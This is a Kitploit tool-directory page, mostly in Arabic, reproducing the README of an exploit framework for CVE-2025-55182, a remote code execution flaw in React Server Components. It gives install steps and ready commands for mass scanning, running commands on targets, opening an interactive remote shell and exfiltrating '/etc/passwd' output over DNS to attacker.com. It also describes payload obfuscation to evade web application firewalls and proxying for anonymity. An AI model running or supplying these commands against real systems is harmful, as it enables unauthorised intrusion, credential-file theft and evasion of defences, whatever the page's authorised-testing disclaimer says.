Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit — ماسح متقدم لثغرة RCE في React Server Components للثغرة CVE-2025-55182. الميزات: بصمة متعددة المراحل، التحقق من الثغرة، تسريب DNS، صدفة تفاعلية، تشويش الحمولة، وتقارير احترافية (JSON/HTML/PDF). للاختبار المصرح به فقط. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتتجاوز WAFاختبار الاختراقأداة الوصول عن بعدتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubcerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit

CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

ماسح متقدم لثغرة RCE في React Server Components للثغرة CVE-2025-55182. الميزات: بصمة متعددة المراحل، التحقق من الثغرة، تسريب DNS، صدفة تفاعلية، تشويش الحمولة، وتقارير احترافية (JSON/HTML/PDF). للاختبار المصرح به فقط.

عرض المستودع
134منذ 2 أشهرلم تتم المراجعة بعد

🔐 ReactRCE-Scanner

CVE-2025-55182 — إطار متقدم لاستغلال وتقييم RCE في مكونات خادم React

Version CVE CVSS Python License

Author PRs Welcome Downloads


📑 جدول المحتويات

  • إخلاء المسؤولية القانونية وإشعار أخلاقي

  • نظرة عامة

  • القدرات الرئيسية

  • دليل البدء السريع

  • البنية المعمارية وتحليل الميزات المتقدم

  • مرجع الإعدادات

  • مجموعة الاختبارات الآلية

  • المعالجة والتخفيف

  • المساهمة والمجتمع

  • المراجع

  • الترخيص والمؤلف


⚠️ إخلاء المسؤولية القانونية وإشعار أخلاقي

تم تصميم هذه الأداة حصريًا لأغراض التعليم واختبارات الأمان المصرح بها. يشكل الاستخدام غير المصرح به لهذا البرنامج ضد أهداف دون موافقة كتابية مسبقة انتهاكًا لقوانين الجرائم الحاسوبية الدولية، بما في ذلك قانون الاحتيال وإساءة استخدام الحاسوب (CFAA)، ومتطلبات GDPR، واتفاقيات شروط الخدمة القياسية. يخلي المؤلف والمساهمون مسؤوليتهم عن أي إساءة استخدام أو عمليات غير قانونية أو أضرار تبعية ناتجة عن هذا البرنامج. استخدمه على مسؤوليتك الخاصة حصريًا.


📋 نظرة عامة

ReactRCE-Scanner هو إطار تقييم وتحقق أمني بمستوى المؤسسات، مصمم خصيصًا لـ CVE-2025-55182 [1]، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على مكونات خادم React عبر الإصدارات من 19.0.0 إلى 19.2.0.

يسد الإطار الفجوة بين البحث النظري عن الثغرات والتحقق الأمني العملي. من خلال دمج البصمة متعددة المراحل، والتقليل الصارم من الإيجابيات الكاذبة، وتعتيم الحمولات المتقدم، وإعداد التقارير الآلية متعددة الصيغ، فإنه يوفر لمهندسي الأمان قدرات تشخيصية دقيقة.

الاستخدامنتائج الفحص

🎯 القدرات الرئيسية

فئة الميزةأبرز ملامح التنفيذالحالة التشغيلية
البصمة الذكيةكشف الإطار والإصدار من مصادر متعددة مع خوارزميات تقييم الثقة.✅
التحقق متعدد المراحلخط تحقق من 5 مراحل مصمم للقضاء المنهجي على الإيجابيات الكاذبة.✅
توليد الحمولاتمُنشئ حمولات مُعتَّمة يدعم تسريب DNS والترميز المتعدد.✅
الصدفة التفاعليةتنفيذ أوامر تفاعلي شبه حقيقي والوصول إلى الصدفة على الأهداف المؤكدة.✅
تقارير شاملةتوليد تقارير آلية بصيغ JSON وHTML وPDF وMarkdown.✅
تسريب DNSتسريب مخرجات الأوامر خارج النطاق عبر معالجة استعلامات DNS الآمنة.✅
محرك التزامنبنية فحص متعددة الخيوط عالية الأداء لأسطح الهجوم الكبيرة.✅
دمج الوكيلدعم وكلاء HTTP/HTTPS وSOCKS لحركة تقييم مجهولة الهوية.✅

🚀 دليل البدء السريع

التثبيت

استنسخ المستودع وتهيئة البيئة باستخدام نص الإعداد الآلي أو تثبيت التبعيات يدويًا:

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh

# Alternatively, install core Python dependencies manually
pip install -r requirements.txt

مرجع الأوامر الأساسية

يعمل الإطار عبر بنية CLI معيارية تدعم التحقق من هدف واحد، والفحص الجماعي من قوائم الملفات، وإنشاء صدفة تفاعلية، وتقارير الامتثال.

# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan

# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json

# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"

# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell

# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com

# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf

🔬 البنية المعمارية وتحليل الميزات المتقدم

1. محرك البصمة الذكية

يقوم الإطار بإجراء استطلاع عميق قبل إرسال الحمولة. يحلل حقول رؤوس HTTP المتعددة (X-Powered-By، Next-Action، RSC)، ووسوم HTML الوصفية الهيكلية (data-reactroot، __NEXT_DATA__)، وأصول البناء الثابتة، وحزم مصدر JavaScript [2] [3].

تُصنَّف درجات الثقة إلى أربع فئات:

  • حرجة (95%+): مؤشرات متعامدة متعددة تؤكد إصدارات وقت تشغيل مكونات خادم React القابلة للاستغلال.

  • عالية (75–95%): مؤشرات هيكلية قوية محددة مع مطابقة إصدار دقيقة.

  • متوسطة (50–75%): علامات إطار جزئية موجودة؛ يلزم التحقق اليدوي.

  • منخفضة (<50%): اكتشاف استدلالات ضعيفة؛ احتمال كبير لإيجابية كاذبة.

2. سير عمل التحقق متعدد المراحل

للحفاظ على السلامة التشغيلية ومنع تعطيل الخدمات غير المقصود، تمر الحمولات عبر خط تحقق صارم قبل فتح أي مرحلة استغلال.

Target URL / Endpoint
       │
       ▼
[Stage 1] Framework & Header Detection
       │
       ▼
[Stage 2] Component Version Analysis
       │
       ▼
[Stage 3] Protocol Compatibility Check
       │
       ▼
[Stage 4] Non-Destructive Safe Validation Request
       │
       ▼
[Stage 5] Statistical Confidence Scoring
       │
       ▼
Vulnerability Assessment Decision

3. تعتيم الحمولات والتهرب

لاختبار الضوابط الدفاعية وجدران حماية تطبيقات الويب (WAFs)، يتضمن الإطار مُنشئ حمولات متقدمًا يدعم:

  • مخططات الترميز: تحويلات Base64 وHexadecimal وOctal.

  • التعتيم الهيكلي: تقسيم السلاسل الديناميكي، وحقن التعليمات البرمجية غير المفيدة، وتعيين طرق require البديلة.

  • التسريب خارج النطاق (OOB): نفق بيانات آمن عبر استعلامات DNS عندما تكون قنوات الاستجابة المباشرة مقيدة.

4. صدفة الأوامر التفاعلية

عند إنشاء الجلسة بنجاح، يمكن للمشغلين استدعاء بيئة صدفة تفاعلية لاستطلاع ما بعد التحقق.

$ python exploit.py -t https://target.com -m shell
[*] Initializing interactive shell session against https://target.com
[!] Type 'exit' to terminate the session.

shell> whoami
www-data

shell> uname -a
Linux ip-10-0-1-15 6.8.0-1018-aws #20-Ubuntu SMP PREMO__X64 x86_64 GNU/Linux
تنزيل الأداة